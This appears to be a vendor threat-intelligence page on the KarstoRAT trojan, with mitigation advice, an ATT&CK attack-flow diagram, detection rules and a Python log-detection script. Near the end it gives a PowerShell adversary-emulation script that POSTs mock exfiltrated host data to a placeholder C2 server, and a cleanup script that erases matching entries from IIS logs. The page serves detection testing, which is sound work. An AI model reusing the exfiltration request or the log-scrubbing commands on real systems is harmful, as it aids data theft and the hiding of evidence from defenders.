A Closer Look at the Novel and Stealthy KarstoRAT Malware
Summary
KarstoRAT is a recently identified remote access trojan capable of collecting system information, capturing audio and webcam feeds, taking screenshots, logging keystrokes, and stealing authentication tokens. The malware maintains persistence, communicates with its command-and-control server over HTTP through a distinctive custom user agent, and can retrieve additional payloads for follow-on activity. It also contains disruptive functions, including screen inversion and forced audio playback.
Investigation
LevelBlue SpiderLabs examined KarstoRAT’s execution flow, command-and-control communications, exfiltration routines, and persistence methods. The report highlights an endless two-second loop used to keep the malware running and describes the STARTUP_ON and STARTUP_OFF commands that control automatic launch behavior. Researchers also documented the malware’s ability to change the desktop wallpaper and remove itself when instructed.
Mitigation
Detection efforts should focus on the malware's hard-coded HTTP User-Agent string ("SecurityNotifier"), suspicious startup-related registry entries (autostart extensibility points in the Software and NTUSER hives), and the abnormal process behavior of a binary that keeps itself alive through the endless two-second loop the report describes. Endpoint defenses should also watch for the fileless-style activity described in the report and block unknown binaries delivered through the fake Roblox marketplace lure.
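The first two indicators above can be checked mechanically. The following Python script is an added example, not LevelBlue/SpiderLabs code and not one of the rules listed under Detections: it parses a small constructed IIS W3C log, flags requests whose User-Agent contains the hard-coded "SecurityNotifier" string quoted in the simulation section below, and flags Sysmon-style registry writes that set a Run/RunOnce autostart value pointing into a user-writable directory. The log lines, registry events, field names and the user-writable-path heuristic are assumptions constructed for the demonstration.

```python
"""Detection logic for the two KarstoRAT indicators named in the Mitigation
section: the hard-coded HTTP User-Agent and startup-related registry writes.
Added example, not LevelBlue/SpiderLabs code; all sample data is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass

# User-Agent string quoted in the simulation section of this page.
KARSTO_USER_AGENT = "SecurityNotifier"

# Autostart (ASEP) keys as they appear in both the HKLM Software and HKCU/HKU
# NTUSER hives, with or without the Wow6432Node redirection.
ASEP_KEY_RE = re.compile(
    r"\\Software\\(Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\",
    re.IGNORECASE,
)
# Heuristic (assumption): user-writable locations that a legitimate installer
# rarely uses for a permanent autostart entry.
SUSPICIOUS_PATH_RE = re.compile(
    r"\\(AppData\\(Local|Roaming)|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE
)


@dataclass(frozen=True)
class Alert:
    rule: str
    detail: str


def parse_w3c_log(text: str) -> list[dict]:
    """Parse an IIS/W3C extended log using its own #Fields directive, so the
    column order never has to be hard-coded. IIS writes '+' for spaces inside
    the User-Agent field; restore them so matching sees the real string."""
    fields: list[str] = []
    records: list[dict] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        rec = dict(zip(fields, values))
        if "cs(User-Agent)" in rec:
            rec["cs(User-Agent)"] = rec["cs(User-Agent)"].replace("+", " ")
        records.append(rec)
    return records


def detect_c2_user_agent(records: list[dict]) -> list[Alert]:
    """Flag any request whose User-Agent contains the hard-coded KarstoRAT UA.
    Substring, case-insensitive: a static malware UA has no version churn,
    but proxies sometimes prefix or wrap the header value."""
    alerts = []
    for rec in records:
        ua = rec.get("cs(User-Agent)", "")
        if KARSTO_USER_AGENT.lower() in ua.lower():
            alerts.append(Alert(
                "KarstoRAT C2 user agent",
                f"{rec.get('c-ip')} {rec.get('cs-method')} {rec.get('cs-uri-stem')} UA={ua!r}",
            ))
    return alerts


def detect_asep_write(events: list[dict]) -> list[Alert]:
    """Flag registry value writes (Sysmon Event ID 13 style fields) that land
    under a Run/RunOnce key and whose data points to a user-writable path."""
    alerts = []
    for ev in events:
        key = ev.get("TargetObject", "")
        data = ev.get("Details", "")
        if ASEP_KEY_RE.search(key) and SUSPICIOUS_PATH_RE.search(data):
            alerts.append(Alert("Suspicious autostart entry",
                                f"{ev.get('Image')} set {key} = {data}"))
    return alerts


# Constructed sample telemetry (not real captures).
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs(User-Agent) sc-status
2024-05-01 10:00:01 10.0.0.5 GET /index.html Mozilla/5.0+(Windows+NT+10.0)+Chrome/124.0 200
2024-05-01 10:00:03 10.0.0.7 POST /karsto_c2 SecurityNotifier 200
2024-05-01 10:00:05 10.0.0.5 GET /favicon.ico Mozilla/5.0+(Windows+NT+10.0)+Chrome/124.0 404
"""

SAMPLE_REGISTRY_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Roaming\svc.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\alice\AppData\Roaming\svc.exe"},
    {"Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
]


def run_detections() -> list[Alert]:
    """Evaluate both rules over the constructed samples: one C2 UA hit, one ASEP hit."""
    return (detect_c2_user_agent(parse_w3c_log(SAMPLE_IIS_LOG))
            + detect_asep_write(SAMPLE_REGISTRY_EVENTS))


if __name__ == "__main__":
    for alert in run_detections():
        print(f"[{alert.rule}] {alert.detail}")
```

Run directly, it prints one alert for the POST to /karsto_c2 and one for the Run-key value pointing into AppData, while the vendor tray entry under Program Files stays silent. The two checks correspond to the Windows Network Connection and registry_event detections listed below; feed them real proxy or IIS logs and Sysmon Event ID 13 records and the same functions apply unchanged.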
Response
If KarstoRAT is identified, isolate the affected device, preserve forensic evidence including HTTP traffic and startup artifacts, and remove all persistence mechanisms. Organizations should rotate exposed credentials and continue monitoring for any secondary payloads that may have been downloaded after the initial compromise.
Attack Flow
```mermaid
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef persistence fill:#ffcc99
    classDef credential fill:#ff9999
    classDef collection fill:#ccffcc
    classDef discovery fill:#ccccff
    classDef impact fill:#ffb347
    classDef defense fill:#d3d3d3

    %% Node definitions
    action_user_execution["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks a fake Roblox marketplace link (social engineering)."]
    class action_user_execution action
    persistence_boot_script["<b>Persistence</b> – <b>T1037 Boot or Logon Initialization Scripts</b><br/>Malware registers itself in STARTUP_ON/OFF to run automatically on boot or logon."]
    class persistence_boot_script persistence
    credential_keylogging["<b>Credential Access</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Malware records keystrokes to capture credentials and other sensitive data."]
    class credential_keylogging credential
    collection_screen_capture["<b>Collection</b> – <b>T1113 Screen Capture</b><br/>Malware periodically captures screenshots of the victim's desktop."]
    class collection_screen_capture collection
    collection_audio_capture["<b>Collection</b> – <b>T1123 Audio Capture</b><br/>Malware records audio from the system microphone."]
    class collection_audio_capture collection
    collection_video_capture["<b>Collection</b> – <b>T1125 Video Capture</b><br/>Malware accesses the webcam to record video of the victim."]
    class collection_video_capture collection
    discovery_process["<b>Discovery</b> – <b>T1057 Process Discovery</b><br/>Malware enumerates running processes to identify security tools or valuable applications."]
    class discovery_process discovery
    discovery_hardware["<b>Discovery</b> – <b>T1592.001 Gather Victim Host Information: Hardware</b><br/>Malware collects hardware details such as CPU, RAM, and GPU."]
    class discovery_hardware discovery
    discovery_software["<b>Discovery</b> – <b>T1592.002 Gather Victim Host Information: Software</b><br/>Malware gathers installed software versions and patches."]
    class discovery_software discovery
    discovery_firmware["<b>Discovery</b> – <b>T1592.003 Gather Victim Host Information: Firmware</b><br/>Malware extracts firmware and BIOS information."]
    class discovery_firmware discovery
    discovery_config["<b>Discovery</b> – <b>T1592.004 Gather Victim Host Information: Client Configuration</b><br/>Malware collects configuration settings such as language, time zone, and network parameters."]
    class discovery_config discovery
    impact_remote_desktop["<b>Impact</b> – <b>T1219.002 Remote Desktop Software</b><br/>Malware uses remote desktop capabilities to alter the desktop background, flip the display, and swap mouse buttons."]
    class impact_remote_desktop impact
    defense_self_destruct["<b>Defense Evasion</b> – <b>T1027.005 Indicator Removal from Tools</b><br/>Malware self-destructs and removes its files to erase evidence."]
    class defense_self_destruct defense

    %% Connections
    action_user_execution -->|leads_to| persistence_boot_script
    persistence_boot_script -->|enables| credential_keylogging
    credential_keylogging -->|enables| collection_screen_capture
    collection_screen_capture -->|enables| collection_audio_capture
    collection_audio_capture -->|enables| collection_video_capture
    collection_video_capture -->|enables| discovery_process
    discovery_process -->|leads_to| discovery_hardware
    discovery_hardware -->|leads_to| discovery_software
    discovery_software -->|leads_to| discovery_firmware
    discovery_firmware -->|leads_to| discovery_config
    discovery_config -->|enables| impact_remote_desktop
    impact_remote_desktop -->|triggers| defense_self_destruct
```
Detections
- Privilege escalation (UAC bypass) in FodHelper (via registry_event)
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- Possible Schtasks or AT Usage for Persistence (via cmdline)
- Possible PING Usage for Delay Execution (via cmdline)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- Possible IP Lookup Domain Communications Attempted (via dns)
- Possible Port Tunneling Service (via dns)
- Detection of KarstoRAT C2 Communication [Windows Network Connection]
- Detection of KarstoRAT Malware Activities [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
The attacker has obtained a foothold on the victim network and wishes to establish a command-and-control channel for KarstoRAT. Instead of a browser-like User-Agent, the malware sends the hard-coded User-Agent string "SecurityNotifier" with every request, and that string is the indicator the detection keys on. The attacker runs a short PowerShell script on the compromised host that issues an HTTP POST to the C2 server with that User-Agent header. The request carries a small JSON payload mimicking exfiltrated data, which is sufficient to trigger the Sigma rule.
Regression Test Script:
```powershell
# KarstoRAT C2 simulation – PowerShell
# Sends a single HTTP POST carrying the hard-coded KarstoRAT User-Agent so the
# Windows Network Connection detection fires. Replace <webserver> with the lab host.
$c2Url = "http://<webserver>/karsto_c2"

# Small JSON body standing in for exfiltrated data
$payload = @{
    host = $env:COMPUTERNAME
    data = "sample exfiltrated data"
} | ConvertTo-Json

try {
    # -UserAgent sets the header the rule matches on; -ContentType labels the JSON body
    Invoke-WebRequest -Uri $c2Url `
        -Method POST `
        -UserAgent "SecurityNotifier" `
        -ContentType "application/json" `
        -Body $payload `
        -UseBasicParsing
    Write-Host "C2 request sent."
} catch {
    Write-Error "Failed to send C2 request: $_"
}
```
Cleanup Commands:
```powershell
# Remove the simulated request from the lab web server's IIS logs (requires admin rights).
# This runs on the host serving <webserver>, not on the simulated victim; IIS keeps the
# active log file open, so run it against rotated files or after stopping the site.
$logPath = "C:\inetpub\logs\LogFiles\W3SVC1"
Get-ChildItem -Path $logPath -Filter "*.log" | ForEach-Object {
    (Get-Content $_.FullName) |
        Where-Object { $_ -notmatch "SecurityNotifier" } |
        Set-Content $_.FullName
}
Write-Host "Logs sanitized."
```